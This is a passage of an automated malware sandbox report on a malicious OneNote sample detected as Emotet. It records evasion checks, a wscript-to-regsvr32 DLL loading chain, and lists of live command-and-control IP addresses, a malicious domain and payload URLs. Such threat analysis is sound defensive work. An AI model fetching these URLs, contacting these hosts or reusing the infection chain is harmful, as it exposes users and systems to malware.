Source: wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405806973.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh9
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0000000180001C48
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000A878 GetProcessHeap, 3_2_000000018000A878
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory, 3_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0000000180001C48
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000001800082EC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00000001800017DC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 164.90.222.65 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 203.26.41.131 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe Network Connect: 66.228.32.31 7080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 187.63.160.88 80 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 104.168.155.143 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 91.121.146.47 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 160.16.142.56 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 167.172.199.165 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 163.44.196.120 8080 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_0000000180001D98

Stealing of Sensitive Information
barindex
Yara detected Malicious OneNote
Source: Yara match File source: Insight_Medical_Publishing.one, type: SAMPLE
Yara detected Emotet
Source: Yara match File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Malicious OneNote
Source: Yara match File source: Insight_Medical_Publishing.one, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828491 Sample: Insight_Medical_Publishing.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 33 129.232.188.93 xneeloZA South Africa 2->33 35 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->35 37 37 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 6 other signatures 2->53 10 ONENOTE.EXE 21 23 2->10         started        signatures3 process4 process5 12 wscript.exe 2 10->12         started        dnsIp6 45 penshorn.org 203.26.41.131, 443, 49685 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->45 29 C:\Users\user\AppData\...\rad0767A.tmp.dll, PE32+ 12->29 dropped 31 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->31 dropped 59 System process connects to network (likely due to code injection or exploit) 12->59 17 regsvr32.exe 12->17         started        file7 signatures8 process9 process10 19 regsvr32.exe 2 17->19         started        file11 27 C:\Windows\System32\...\zBLf.dll (copy), PE32+ 19->27 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->55 23 regsvr32.exe 19->23         started        signatures12 process13 dnsIp14 39 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 23->39 41 91.121.146.47, 49686, 8080 OVHFR France 23->41 43 7 other IPs or domains 23->43 57 System process connects to network (likely due to code injection or exploit) 23->57 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
103.132.242.26
 unknown India
45117 INPL-IN-APIshansNetworkIN true
104.168.155.143
 unknown United States
54290 HOSTWINDSUS true
79.137.35.198
 unknown France
16276 OVHFR true
115.68.227.76
 unknown Korea Republic of
38700 SMILESERV-AS-KRSMILESERVKR true
163.44.196.120
 unknown Singapore
135161 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG true
206.189.28.199
 unknown United States
14061 DIGITALOCEAN-ASNUS true
203.26.41.131
 penshorn.org Australia
38719 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU true
107.170.39.149
 unknown United States
14061 DIGITALOCEAN-ASNUS true
66.228.32.31
 unknown United States
63949 LINODE-APLinodeLLCUS true
197.242.150.244
 unknown South Africa
37611 AfrihostZA true
185.4.135.165
 unknown Greece
199246 TOPHOSTGR true
183.111.227.137
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
169.57.156.166
 unknown United States
36351 SOFTLAYERUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
139.59.126.41
 unknown Singapore
14061 DIGITALOCEAN-ASNUS true
167.172.253.162
 unknown United States
14061 DIGITALOCEAN-ASNUS true
167.172.199.165
 unknown United States
14061 DIGITALOCEAN-ASNUS true
202.129.205.3
 unknown Thailand
45328 NIPA-AS-THNIPATECHNOLOGYCOLTDTH true
147.139.166.154
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
153.92.5.27
 unknown Germany
47583 AS-HOSTINGERLT true
159.65.88.10
 unknown United States
14061 DIGITALOCEAN-ASNUS true
172.105.226.75
 unknown United States
63949 LINODE-APLinodeLLCUS true
164.90.222.65
 unknown United States
14061 DIGITALOCEAN-ASNUS true
213.239.212.5
 unknown Germany
24940 HETZNER-ASDE true
5.135.159.50
 unknown France
16276 OVHFR true
186.194.240.217
 unknown Brazil
262733 NetceteraTelecomunicacoesLtdaBR true
119.59.103.152
 unknown Thailand
56067 METRABYTE-TH453LadplacoutJorakhaebuaTH true
159.89.202.34
 unknown United States
14061 DIGITALOCEAN-ASNUS true
91.121.146.47
 unknown France
16276 OVHFR true
160.16.142.56
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
201.94.166.162
 unknown Brazil
28573 CLAROSABR true
91.207.28.33
 unknown Kyrgyzstan
39819 PROHOSTKG true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
103.43.75.120
 unknown Japan 20473 AS-CHOOPAUS true
188.44.20.25
 unknown Macedonia
57374 GIV-ASMK true
45.235.8.30
 unknown Brazil
267405 WIKINETTELECOMUNICACOESBR true
153.126.146.25
 unknown Japan 7684 SAKURA-ASAKURAInternetIncJP true
72.15.201.15
 unknown United States
13649 ASN-VINSUS true
187.63.160.88
 unknown Brazil
28169 BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR true
82.223.21.224
 unknown Spain
8560 ONEANDONE-ASBrauerstrasse48DE true
173.212.193.249
 unknown Germany
51167 CONTABODE true
95.217.221.146
 unknown Germany
24940 HETZNER-ASDE true
149.56.131.28
 unknown Canada
16276 OVHFR true
182.162.143.56
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR true
1.234.2.232
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
94.23.45.86
 unknown France
16276 OVHFR true

Contacted Domains

Name IP Active
penshorn.org 203.26.41.131 true
c-0001.c-msedge.net 13.107.4.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://penshorn.org/admin/Ses8712iGR8du/ true
  • Avira URL Cloud: malware
 unknown
https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/ true
  • Avira URL Cloud: malware
 unknown